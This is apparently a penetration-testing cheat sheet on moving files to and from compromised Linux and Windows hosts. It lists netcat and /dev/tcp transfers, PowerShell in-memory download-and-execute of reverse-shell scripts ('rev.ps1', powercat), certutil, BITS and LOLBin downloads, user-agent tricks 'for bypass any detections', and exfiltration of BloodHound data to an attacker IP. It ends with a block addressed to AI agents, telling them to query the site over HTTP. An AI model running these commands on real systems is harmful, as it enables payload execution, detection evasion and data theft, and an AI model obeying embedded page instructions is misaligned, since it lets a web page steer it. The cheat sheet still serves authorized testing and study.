# File Transfers

## 01. Linux

* Simple file transfer (My way)

```bash
## ------------------| NetCat
### Receiving side
nc -lp 1234 > out.file
### Sending side
nc -w 3 <ReceiverIP> 1234 < out.file
cat out.file > /dev/tcp/<DestinationIP>/1234

# ------------------| Socat
### Sending side
socat TCP4-LISTEN:1234,fork file:secret.txt
### Receiving side
socat TCP4:<SenderIP>:1234 file:secret.txt,create

# ------------------| SSH
### To copy a file from B to A while logged into B:
scp /path/to/file username@a:/path/to/destination
### To copy a file from B to A while logged into A:
scp username@b:/path/to/file /path/to/destination
```

* Download Files.

```bash
## ------------------| AXEL
axel -a -n 10 -k -o /tmp/secret.txt https://<IP>/secret.txt
## -a    Alternate progress indicator
## -n    Specify maximum number of connections
## -k    Don't verify the SSL certificate

## ------------------| WGET
wget https://<IP>/secret.txt -O /tmp/secret.txt

## ------------------| CURL
curl https://<IP>/secret.txt -o /tmp/secret.txt 

## ------------------| OpenSSL
### Create certificate
openssl req -newkey rsa:2048 -nodes -keyout key.pem -x509 -days 365 -out certificate.pem     
### Stand up server
openssl s_server -quiet -accept 80 -cert certificate.pem -key key.pem < /tmp/secret.txt
### Download file
openssl s_client -connect <IP>:80 -quiet > secret.txt

## ------------------| Bash (/dev/tcp)
### Connect to Target's Webserver
exec 3<>/dev/tcp/10.10.10.32/80
### HTTP GET Request
echo -e "GET /secret.txt HTTP/1.1\n\n">&3
### Print the Response
cat <&3

## ------------------| PHP
### File_get_contents()
php -r '$file = file_get_contents("https://<IP>/secret.txt"); file_put_contents("secret.txt",$file);'       
### Fopen()
php -r 'const BUFFER = 1024; $fremote = fopen("https://<IP>/secret.txt", "rb"); $flocal = fopen("secret.txt", "wb"); while ($buffer = fread($fremote, BUFFER)) { fwrite($flocal, $buffer); } fclose($flocal); fclose($fremote);'      

## ------------------| Python
### default
python -c "import requests; open('secret.txt', 'wb').write(requests.get('http://<IP>/secret.txt').content)"
### Python2
import urllib
urllib.urlretrieve ("https://<IP>/secret.txt", "secret.txt")
### Python3
import urllib.request
urllib.request.urlretrieve("https://<IP>/secret.txt", "secret.txt")

## ------------------| Ruby
ruby -e 'require "net/http"; File.write("secret.txt", Net::HTTP.get(URI.parse("https://<IP>/secret.txt")))'

## ------------------| Perl
perl -e 'use LWP::Simple; getstore("https://<IP>/secret.txt", "secret.txt");'
```

## 02. Windows

* [Powercat](https://github.com/besimorhino/powercat)

```bash
## ------------------| Download & Execute
wget https://raw.githubusercontent.com/besimorhino/powercat/master/powercat.ps1
powershell -c "IEX (New-Object System.Net.Webclient).DownloadString('http://<IP>/powercat.ps1')"

## ------------------| Sender 
powercat -c <IP> -p 1212 -i C:\Users\secret.txt

## ------------------| Receiver
nc -lnvp 1212 > secret.txt
```

* Download files.

```bash
## ------------------| Old version (support for any version)
powershell -c "(New-Object System.Net.WebClient).DownloadFile('http://<IP>/nc.exe', 'C:\Users\Public\nc.exe')" 

## ------------------| New version (alias IWR)
powershell -c "Invoke-WebRequest http://<IP>/nc.exe -OutFile C:\Users\Public\nc.exe"

## ------------------| Executed in memory (alias IEX)
powershell -c "Invoke-Expression (New-Object Net.WebClient).DownloadString('http://10.10.14.25/rev.ps1')"
powershell -c "Invoke-WebRequest http://10.10.14.25/rev.ps1 | iex"

## ------------------| Internet Explorer’s First Run error (-useBasicParsing)
powershell -c "IWR -useBasicParsing http://<IP>/nc.exe -o C:\Users\Public\nc.exe"
### If you have admin access you can disable Internet Explorer’s First Run customization
reg add "HKLM\SOFTWARE\Microsoft\Internet Explorer\Main" /f /v DisableFirstRunCustomize /t REG_DWORD /d 2

## ------------------| CMD ways
certutil -urlcache -split -f "http://<IP>/nc.exe" C:\Users\Public\nc.exe

## ------------------| Using Curl
powershell curl http://<IP>/rev.ps1

## ------------------| The Background Intelligent Transfer Service (BITS)
bitsadmin /transfer n http://<IP>/nc.exe C:\Temp\nc.exe
Import-Module bitstransfer;Start-BitsTransfer -Source "http://<IP>/nc.exe" -Destination "C:\Temp\nc.exe"
```

* Upload Files.

```bash
$b64 = [System.convert]::ToBase64String((Get-Content -Path 'C:/<PATH>/BloodHound.zip' -Encoding Byte))     
Invoke-WebRequest -Uri http://<IP>:443 -Method POST -Body $b64
## Download file with netcat
echo <base64> | base64 -d -w 0 > bloodhound.zip

## ------------------| The Background Intelligent Transfer Service (BITS)
Start-BitsTransfer "C:\Temp\bloodhound.zip" -Destination "http://<IP>/uploads/bloodhound.zip" -TransferType Upload -ProxyUsage Override -ProxyList PROXY01:8080 -ProxyCredential INLANEFREIGHT\svc-sql    

## ------------------| HTTP POST
### Creare following up.php code in host machine
<?php 
$up_dir = '/var/www/html/';
$up_file = $up_dir . $_FILES['file']['name'];
move_uploaded_file($_FILES['file']['name'], $up_file);
?>
### Change file permision
sudo chown www-data: /var/www/html
### Upload file through powershell
powershell (New-Object Net.WebClient).UploadFile('http://<IP>/up.php', 'nc.exe')
```

* `wget` Scripts

```bash
## ------------------| Create wget.js file
var WinHttpReq = new ActiveXObject("WinHttp.WinHttpRequest.5.1");
WinHttpReq.Open("GET", WScript.Arguments(0), /*async=*/false);
WinHttpReq.Send();
BinStream = new ActiveXObject("ADODB.Stream");
BinStream.Type = 1;
BinStream.Open();
BinStream.Write(WinHttpReq.ResponseBody);
BinStream.SaveToFile(WScript.Arguments(1));

## ------------------| It can be executed as follows.
cscript /nologo wget.js http://<IP>/nc.exe nc.exe

## ------------------| Create wget.vbs file
dim xHttp: Set xHttp = createobject("Microsoft.XMLHTTP")
dim bStrm: Set bStrm = createobject("Adodb.Stream")
xHttp.Open "GET", WScript.Arguments.Item(0), False
xHttp.Send

with bStrm
    .type = 1
    .open
    .write xHttp.responseBody
    .savetofile WScript.Arguments.Item(1), 2
end with

## ------------------| It can be executed as follows.
cscript /nologo wget.vbs http://<IP>/nc.exe nc.exe
```

* Diffrent `User-Agent` (For bypass any detections)

```bash
## ------------------| WinHttp (Netscape 4.0)
$h=new-object -com WinHttp.WinHttpRequest.5.1;
$h.open('GET','http://<IP>/nc.exe',$false);
$h.send();
iex $h.ResponseText

## ------------------| Msxml2 (Internet Explorer 7.0)
$h=New-Object -ComObject Msxml2.XMLHTTP;
$h.open('GET','http://<IP>/nc.exe',$false);
$h.send();
iex $h.responseText

## ------------------| Certutil
certutil -urlcache -split -f http://<IP>/nc.exe 
certutil -verifyctl -split -f http://<IP>/nc.exe

## ------------------| BITS
Import-Module bitstransfer;
Start-BitsTransfer 'http://<IP>/nc.exe' $env:temp\t;
$r=gc $env:temp\t;
rm $env:temp\t; 
iex $r

## ------------------| Invoke-WebRequest with User-Agent
### List all avilable user agents
[Microsoft.PowerShell.Commands.PSUserAgent].GetProperties() | Select-Object Name,@{label="User Agent";Expression={[Microsoft.PowerShell.Commands.PSUserAgent]::$($_.Name)}} | fl      
### Download file using a Chrome User Agent
Invoke-WebRequest http://<IP>/nc.exe -UserAgent [Microsoft.PowerShell.Commands.PSUserAgent]::Chrome -OutFile "C:\Users\Public\nc.exe"
```

* `exe2hex`[ ](https://github.com/g0tmi1k/exe2hex)[Download](https://github.com/g0tmi1k/exe2hex)

```bash
upx -9 nc.exe
exe2hex -x nc.exe
```

## 03. Simple Servers

* Web servers

```bash
## ------------------| Python
python2 -m SimpleHTTPServer 8080
python3 -m http.server 8080

## ------------------| Ruby
ruby -run -e httpd . -p 8080

## ------------------| PHP
php -S 0.0.0.0:8080

## ------------------| Socat
socat TCP-LISTEN:8080,reuseaddr,fork

## ------------------| BusyBox
busybox httpd -f -p 10000

## ------------------| HTTPS 
git clone https://github.com/h4rithd/SPython3.git && cd SPython3
pip3 install -r requirements.txt
python3 spython3.py
```

* FTP server

```bash
python3 -m pyftpdlib --user=pentester --password=p4ssw0rd -wTFTP
```

* TFTP server (Require Administrative Access)

```bash
## ------------------| Windows Enable TFTP
DISM /online /Enable-Feature /FeatureName:TFTP
Install-WindowsFeature TFTP-Client

## ------------------| Linux
sudo apt-get install -y atftp
mkdir /tmp/tftp
sudo chown nobody: /tmp/tftp
sudo atftpd --daemon --port 40 /tmp/tftp

## ------------------| Upload file (on windows machine)
tftp -i <IP> put nc.exe
```

* SMB server

```bash
## ------------------| Basic usage
impacket-smbserver <shareName> <sharePath>
impacket-smbserver share $(pwd) -smb2support

## ------------------| Start smb server (With auth)
### Start smb server
impacket-smbserver share $(pwd) -smb2support -username h4rithd -password Password123       

## ------------------| Mount without auth
net use Z: \\<MyIP>\share /USER:h4rithd Password123
New-PSDrive -Name h4rithd -PSProvider FileSystem -Root \\<MyIP>\share

## ------------------| Mount with auth
$pass = ConvertTo-SecureString 'Password123' -AsPlainText -Force
$cred = New-Object System.Management.Automation.PSCredential('h4rithd', $pass)
New-PSDrive -Name h4rithd -PSProvider FileSystem -Credential $cred -Root \\<MyIP>\share
cd h4rithd:
dir
```

* RDP Server

```bash
rdesktop -g 1600x800 -r disk:tmp=/tmp/shares <IP> -u h4rithd -p /dynamic-resolution
xfreerdp /u:h4rithd /p:Password123 /cert:ignore /v:<IP> /workarea /drive:/localdir,share /dynamic-resolution +clipboard
```

* Setup `nginx` server to upload files.

```bash
## ------------------| Create server
mkdir -p /tmp/uploads
chmod 777 /tmp/uploads/
sudo chown www-data /tmp/uploads/

sudo vi /etc/nginx/sites-available/file_upload
server {
    listen 8001 default_server;
    server_name up.h4rithd;
    location / {
        root /tmp/uploads;
        dav_methods PUT;
    }
}

sudo ln -s  /etc/nginx/sites-available/file_upload /etc/nginx/sites-enabled/file_upload     
systemctl start nginx

## ------------------| Upload File
curl --upload-file UploadFile.txt IP:8001
```

## 04. Living Off The Land Binaries

* [Windows](https://lolbas-project.github.io/#gfxdownloadwrapper)

```bash
GfxDownloadWrapper.exe "http://<IP>/nc.exe" "C:\Temp\nc.exe"
```

* [Linux](https://gtfobins.github.io/gtfobins/lwp-download/)

```bash
lwp-download http://<IP>/nc.exe nc.exe
```


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://docs.h4rithd.com/tools/file-transfers.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.